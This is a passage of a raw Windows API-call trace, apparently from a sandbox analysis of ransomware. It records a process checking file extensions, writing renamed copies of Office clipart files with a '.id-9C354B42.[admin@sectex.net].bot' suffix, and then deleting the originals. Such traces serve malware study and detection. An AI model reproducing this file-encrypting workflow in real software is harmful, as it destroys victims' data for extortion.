	[0160.011] lstrlenW (lpString=".xls") returned 4
	[0160.011] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.011] lstrlenW (lpString=".xlsx") returned 5
	[0160.011] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0160.011] lstrlenW (lpString=".ppt") returned 4
	[0160.011] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned 63
	[0160.011] lstrlenW (lpString=".zip") returned 4
	[0160.011] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.011] lstrlenW (lpString=".rar") returned 4
	[0160.011] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.011] lstrlenW (lpString=".bz2") returned 4
	[0160.011] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.011] lstrlenW (lpString=".7z") returned 3
	[0160.011] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned 63
	[0160.011] lstrlenW (lpString=".dbf") returned 4
	[0160.011] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned 63
	[0160.012] lstrlenW (lpString=".1cd") returned 4
	[0160.012] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned 63
	[0160.012] lstrlenW (lpString=".jpg") returned 4
	[0160.012] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.012] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0160.012] lstrlenW (lpString="J0107132.WMF") returned 12
	[0160.012] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107132.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0160.012] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=48380) returned 1
	[0160.012] CloseHandle (hObject=0x25c) returned 1
	[0160.013] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107132.wmf")) returned 0x20
	[0160.013] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107132.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107132.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0160.013] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.013] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107132.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0160.014] GetLastError () returned 0x0
	[0160.014] ReadFile (in: hFile=0x25c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xbcfc, lpOverlapped=0x0) returned 1
	[0160.042] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xbd00, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xbd00, lpOverlapped=0x0) returned 1
	[0160.044] ReadFile (in: hFile=0x25c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.044] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.044] SetEndOfFile (hFile=0x1d8) returned 1
	[0160.044] CloseHandle (hObject=0x1d8) returned 1
	[0160.044] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.044] SetEndOfFile (hFile=0x25c) returned 1
	[0160.047] CloseHandle (hObject=0x25c) returned 1
	[0160.047] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.047] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107132.wmf")) returned 1
	[0160.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned 63
	[0160.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned 63
	[0160.048] lstrlenW (lpString=".doc") returned 4
	[0160.048] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.048] lstrlenW (lpString=".docx") returned 5
	[0160.048] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0160.048] lstrlenW (lpString=".pdf") returned 4
	[0160.048] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.048] lstrlenW (lpString=".xls") returned 4
	[0160.048] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.048] lstrlenW (lpString=".xlsx") returned 5
	[0160.048] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0160.048] lstrlenW (lpString=".ppt") returned 4
	[0160.048] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned 63
	[0160.048] lstrlenW (lpString=".zip") returned 4
	[0160.048] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.048] lstrlenW (lpString=".rar") returned 4
	[0160.048] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.048] lstrlenW (lpString=".bz2") returned 4
	[0160.048] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.049] lstrlenW (lpString=".7z") returned 3
	[0160.049] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned 63
	[0160.049] lstrlenW (lpString=".dbf") returned 4
	[0160.049] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned 63
	[0160.049] lstrlenW (lpString=".1cd") returned 4
	[0160.049] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned 63
	[0160.049] lstrlenW (lpString=".jpg") returned 4
	[0160.049] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned 63
	[0160.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned 63
	[0160.049] lstrlenW (lpString=".doc") returned 4
	[0160.049] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.049] lstrlenW (lpString=".docx") returned 5
	[0160.049] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0160.049] lstrlenW (lpString=".pdf") returned 4
	[0160.049] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.049] lstrlenW (lpString=".xls") returned 4
	[0160.049] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.049] lstrlenW (lpString=".xlsx") returned 5
	[0160.049] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0160.049] lstrlenW (lpString=".ppt") returned 4
	[0160.049] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned 63
	[0160.049] lstrlenW (lpString=".zip") returned 4
	[0160.049] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.049] lstrlenW (lpString=".rar") returned 4
	[0160.049] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.050] lstrlenW (lpString=".bz2") returned 4
	[0160.050] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.050] lstrlenW (lpString=".7z") returned 3
	[0160.050] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned 63
	[0160.050] lstrlenW (lpString=".dbf") returned 4
	[0160.050] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned 63
	[0160.050] lstrlenW (lpString=".1cd") returned 4
	[0160.050] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned 63
	[0160.050] lstrlenW (lpString=".jpg") returned 4
	[0160.050] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.050] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0160.050] lstrlenW (lpString="J0107146.WMF") returned 12
	[0160.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107146.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0160.060] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=14996) returned 1
	[0160.060] CloseHandle (hObject=0x37c) returned 1
	[0160.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107146.wmf")) returned 0x20
	[0160.063] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107146.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107146.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0160.064] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.064] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107146.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0160.065] GetLastError () returned 0x0
	[0160.065] ReadFile (in: hFile=0x37c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x3a94, lpOverlapped=0x0) returned 1
	[0160.067] WriteFile (in: hFile=0x3d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x3aa0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x3aa0, lpOverlapped=0x0) returned 1
	[0160.068] ReadFile (in: hFile=0x37c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.068] WriteFile (in: hFile=0x3d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.068] SetEndOfFile (hFile=0x3d8) returned 1
	[0160.068] CloseHandle (hObject=0x3d8) returned 1
	[0160.069] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.069] SetEndOfFile (hFile=0x37c) returned 1
	[0160.071] CloseHandle (hObject=0x37c) returned 1
	[0160.071] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.071] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107146.wmf")) returned 1
	[0160.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned 63
	[0160.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned 63
	[0160.072] lstrlenW (lpString=".doc") returned 4
	[0160.072] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.072] lstrlenW (lpString=".docx") returned 5
	[0160.072] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0160.072] lstrlenW (lpString=".pdf") returned 4
	[0160.072] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.072] lstrlenW (lpString=".xls") returned 4
	[0160.072] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.072] lstrlenW (lpString=".xlsx") returned 5
	[0160.072] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0160.072] lstrlenW (lpString=".ppt") returned 4
	[0160.072] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned 63
	[0160.072] lstrlenW (lpString=".zip") returned 4
	[0160.072] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.072] lstrlenW (lpString=".rar") returned 4
	[0160.072] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.072] lstrlenW (lpString=".bz2") returned 4
	[0160.072] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.072] lstrlenW (lpString=".7z") returned 3
	[0160.072] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned 63
	[0160.072] lstrlenW (lpString=".dbf") returned 4
	[0160.072] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned 63
	[0160.072] lstrlenW (lpString=".1cd") returned 4
	[0160.072] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned 63
	[0160.072] lstrlenW (lpString=".jpg") returned 4
	[0160.073] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned 63
	[0160.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned 63
	[0160.073] lstrlenW (lpString=".doc") returned 4
	[0160.073] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.073] lstrlenW (lpString=".docx") returned 5
	[0160.073] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0160.073] lstrlenW (lpString=".pdf") returned 4
	[0160.073] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.073] lstrlenW (lpString=".xls") returned 4
	[0160.073] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.073] lstrlenW (lpString=".xlsx") returned 5
	[0160.073] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0160.073] lstrlenW (lpString=".ppt") returned 4
	[0160.073] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned 63
	[0160.073] lstrlenW (lpString=".zip") returned 4
	[0160.073] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.073] lstrlenW (lpString=".rar") returned 4
	[0160.073] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.073] lstrlenW (lpString=".bz2") returned 4
	[0160.073] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.073] lstrlenW (lpString=".7z") returned 3
	[0160.073] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned 63
	[0160.073] lstrlenW (lpString=".dbf") returned 4
	[0160.073] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned 63
	[0160.073] lstrlenW (lpString=".1cd") returned 4
	[0160.073] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned 63
	[0160.074] lstrlenW (lpString=".jpg") returned 4
	[0160.074] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.074] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0160.074] lstrlenW (lpString="J0107148.WMF") returned 12
	[0160.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107148.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0160.075] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=20136) returned 1
	[0160.075] CloseHandle (hObject=0x25c) returned 1
	[0160.075] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107148.wmf")) returned 0x20
	[0160.075] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107148.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107148.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0160.076] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.076] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107148.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0160.076] GetLastError () returned 0x0
	[0160.076] ReadFile (in: hFile=0x25c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x4ea8, lpOverlapped=0x0) returned 1
	[0160.078] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x4eb0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x4eb0, lpOverlapped=0x0) returned 1
	[0160.080] ReadFile (in: hFile=0x25c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.080] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.080] SetEndOfFile (hFile=0x37c) returned 1
	[0160.080] CloseHandle (hObject=0x37c) returned 1
	[0160.080] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.080] SetEndOfFile (hFile=0x25c) returned 1
	[0160.082] CloseHandle (hObject=0x25c) returned 1
	[0160.082] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.082] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107148.wmf")) returned 1
	[0160.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned 63
	[0160.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned 63
	[0160.083] lstrlenW (lpString=".doc") returned 4
	[0160.083] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.083] lstrlenW (lpString=".docx") returned 5
	[0160.083] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0160.083] lstrlenW (lpString=".pdf") returned 4
	[0160.083] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.083] lstrlenW (lpString=".xls") returned 4
	[0160.083] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.083] lstrlenW (lpString=".xlsx") returned 5
	[0160.083] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0160.083] lstrlenW (lpString=".ppt") returned 4
	[0160.083] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned 63
	[0160.084] lstrlenW (lpString=".zip") returned 4
	[0160.084] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.084] lstrlenW (lpString=".rar") returned 4
	[0160.084] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.084] lstrlenW (lpString=".bz2") returned 4
	[0160.084] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.084] lstrlenW (lpString=".7z") returned 3
	[0160.084] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned 63
	[0160.084] lstrlenW (lpString=".dbf") returned 4
	[0160.084] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned 63
	[0160.084] lstrlenW (lpString=".1cd") returned 4
	[0160.084] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned 63
	[0160.084] lstrlenW (lpString=".jpg") returned 4
	[0160.084] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned 63
	[0160.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned 63
	[0160.084] lstrlenW (lpString=".doc") returned 4
	[0160.084] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.084] lstrlenW (lpString=".docx") returned 5
	[0160.084] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0160.084] lstrlenW (lpString=".pdf") returned 4
	[0160.084] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.084] lstrlenW (lpString=".xls") returned 4
	[0160.084] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.084] lstrlenW (lpString=".xlsx") returned 5
	[0160.084] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0160.084] lstrlenW (lpString=".ppt") returned 4
	[0160.084] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned 63
